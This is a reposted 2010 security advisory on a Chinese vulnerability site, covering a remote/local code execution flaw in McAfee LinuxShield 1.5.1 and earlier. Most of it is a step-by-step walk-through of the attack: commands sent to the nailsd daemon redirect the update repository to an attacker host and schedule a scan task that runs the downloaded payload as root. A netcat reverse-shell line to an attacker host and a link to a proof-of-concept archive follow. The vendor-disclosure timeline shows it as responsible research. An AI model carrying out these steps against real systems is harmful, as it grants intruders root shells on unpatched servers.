McAfee LinuxShield 本地/远程代码执行漏洞

来源:
sitedir
安全提醒:
部分程序具有攻击性,任何用于非法用途的测试均与本站无关!第三方软件下载均为外链,失效请反馈!
Baidu Google So

详情分析

McAfee LinuxShield remote/local code
影响版本: McAfee LinuxShield <= 1.5.1
远程攻击: Yes
本地溢出: Yes
背景阅读:
===========


LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine ?&#65533;&#65533; the engine common to all our
anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed
?&#65533;&#65533; a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)



Description:
============

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability but an attacker must
be authenticated.

The LinuxShield Webinterface communicates with the localy installed
"nailsd" daemon, which listens on port 65443/tcp, to do
configuration
changes, query the configuration and execute tasks.

Each user, which can login to the victim box, can also authenticate
it self to the "nailsd" and can do configuration changes and
execute
tasks with root privileges.

A direct execution of commands is not possible, but it is possible to
download and execute code through manipulation of the config and
execute schedule tasks of the LinuxShield.


walk-through (after the TLS handshake):
+--------------------------------------

nailsd > +OK welcome to the NAILS Statistics Service
attacker> auth <user> <pass>
nailsd > +OK successful authentication

# Set the Attacker repository to download our code from a httpd
# (catalog.z)
#---------------------------------------------------------------
attacker> db set 1 _table=repository status=1 siteList=<?xml version
="1.0" encoding="UTF-8"?><ns:SiteLists
xmlns:ns="naSiteLi
st" GlobalVersion="20030131003110"
LocalVersion="20091209
161903" Type="Client"><SiteList
Default="1" Name="SomeGU
ID"><HttpSite Type="repository"
Name="EvilRepo" Order="1
" Server="<attackerhost>:80"
Enabled="1" Local="1"><Rela

tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
rName></
UserName><Password
Encrypted="0"/></HttpSite></SiteList></
ns:SiteLists> _cmd=update
nailsd > +OK database changes buffered.

# Execute task to set the attacker repository
#---------------------------------------------------------------
attacker> task setsitelist
nailsd > +OK setting sitelist from CMA.

# Execute the default Update task to download the code
#---------------------------------------------------------------
attacker> task nstart LinuxShield Update
nailsd > +OK task LinuxShield Update starting

# Create a Scan profile, which executes our code. The profiles are
# not stored in the database.
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
#---------------------------------------------------------------
attacker> sconf ODS_99 begin
nailsd > +OK 1260400888

# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
path
# where our earlier downloaded catalog.z file is stored.
# (/opt/McAfee/cma/scratch/update/catalog.z)
#---------------------------------------------------------------
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
ofile.ODS_99.filter.extensions.type=extension nailsd.profil
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
ss nailsd.profile.ODS_99.action.error=Block
nailsd > +OK configuration changes buffered
attacker> sconf ODS_99 commit 1260400888
nailsd > +OK configuration changes stored

# Set a scan task with the manipulated profile to execute the code
#---------------------------------------------------------------
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
mp;exclude:false timetable=type=unscheduled taskResults=0 i
_lastRun=1260318482 status=Stopped _cmd=insert
nailsd > +OK database changes buffered

# Execute scan task to execute the code
#---------------------------------------------------------------
attacker> task nstart Evil Task

+-------------------------------------- walk-through EOF


To get a reverse root shell place something like this in the catalog.z

--- snip ---
#!/bin/sh
nc -nv <attacker_host> 4444 -e /bin/sh
--- /snip ---



Proof of Concept :
==================

http://inj3ct0r.com/sploits/11165.tar.gz



Solution:
=========

McAfee Advisory
+--------------
https://kc.mcafee.com/corporate/index?page=content&id=SB10007



Disclosure Timeline (YYYY/MM/DD):
=================================

2009.12.07: Vulnerability found
2010.02.03: Asked vendor for a PGP key
2010.02.05: Vendor sent his PGP key
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2010.02.18) to Vendor
2010.02.05: Vendor acknowledges the reception of the advisory
2010.02.16: Ask for a status update, because the planned release date is
2010.02.18.
2010.02.16: Vendor response that, they are currently working on a patch
2010.02.17: Changed release date to 2010.02.25.
2010.02.22: Vendor gives a status update, that they are able to release
the patch on 2010.02.25.
2010.02.24: Ask for a list of affected products and the advisory url.
2010.02.24: Vendor sends the list.
2010.03.02: Release of this Advisory

漏洞提示

本漏洞涉及到系统下如下文件
demo.php(暂无)

www.sitedirsec.com(暂无代码片段)

官方很懒啦,不会发通告的啦!
专业的 爱国的 网络安全组织.
技术范围:安全漏洞研究与发布,企业安全信息报告,网络基础设施安全漏洞识别,安全防范措施定制,评估企业内部系统和机密信息风险,安全技术交流,主攻方向WEB类服务器安全检测. 
点击进入查看更多关于[非安全中国网]的安全报告!

# 漏洞标题 发布时间
1154 McAfee LinuxShield 本地/远程代码执行漏洞 2010-3-6

# 帖子标题 作者时间

作者贡献(sitedir/663)

# 漏洞标题 发布时间
1892 Adobe Connect 9.5.7 - Cross-Site Scripting 2016-11-1
1890 PHPCMS V9最新版本后台设计缺陷获取getshell 2016-9-20
1889 十二行代码让主流浏览器全线崩溃 2016-9-19
1888 Windows/x86 Password Protected TCP Bind Shell 2016-9-19
1884 逐浪cms 2.4任意文件上传漏洞 2015-12-1
1883 vBulletin 5 远程命令执行(无需登录) 2015-12-1
1882 Phpcmsv9 注入0day分析 2015-12-1
1881 pigcms多版本SQL注入漏洞 2015-12-1
1879 MySQL Error Based SQL Injection Using EXP 2015-8-25
1877 DedeCMS < 5.7-sp1 - 远程文件包含漏洞 2015-7-31

机会与挑战

招聘职位 简介

官方职能 联系方式 移动关注
漏洞投递 pow78781#sitedirsec.com
sitedirsec
求职招聘 job#sitedirsec.com
获取邀请码 notice#sitedirsec.com
官方公告 notice#sitedirsec.com
官方微博 http://t.qq.com/baiduDSB

最新漏洞

网友评论